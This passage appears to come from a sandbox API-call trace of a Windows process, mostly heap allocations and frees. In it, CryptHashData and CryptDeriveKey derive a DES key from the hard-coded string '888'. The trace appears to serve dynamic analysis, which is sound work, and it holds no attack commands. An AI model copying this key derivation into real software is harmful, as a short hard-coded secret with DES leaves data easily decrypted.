Flags=0x0, Size=0x10) returned 0x2e50998 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0211.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0211.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.971] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0211.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0211.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0211.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.972] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0211.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0211.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0211.972] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0211.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0211.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0211.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0211.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0211.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0211.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0211.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0211.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0211.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0211.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0211.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0211.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0211.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0211.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0211.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0211.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0211.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0211.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0211.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0211.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0211.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0211.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0211.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0211.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0211.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0211.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0211.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0211.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0211.982] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0211.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0211.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0211.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0211.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0211.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0211.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50b00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0211.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0211.984] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0211.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0211.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.984] CryptHashData (hHash=0xa87490, pbData=0x2e54e68, dwDataLen=0x3, dwFlags=0x1) returned 1 [0211.984] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.984] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0211.984] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.984] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0211.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.985] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.985] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0211.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0211.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.985] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.985] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0211.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0211.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0211.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0211.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0211.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0211.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0211.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0211.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0211.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0211.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0211.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0211.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0211.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0211.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0211.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0211.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0211.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0211.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0211.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0211.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0211.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0211.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0211.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0211.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0211.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0211.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0211.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0211.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0211.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0211.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50bd8 [0211.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50bd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0211.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0211.988] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0211.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0211.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0211.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0211.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0211.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0211.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0211.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0211.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0211.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0211.989] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa872d0) returned 1 [0211.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0211.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0211.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0211.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0211.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0211.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0211.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0211.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0211.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0211.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0211.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0211.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0211.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0211.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0211.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0211.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0211.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0211.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0211.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0211.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0211.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0211.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0211.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.991] HeapFree (in: 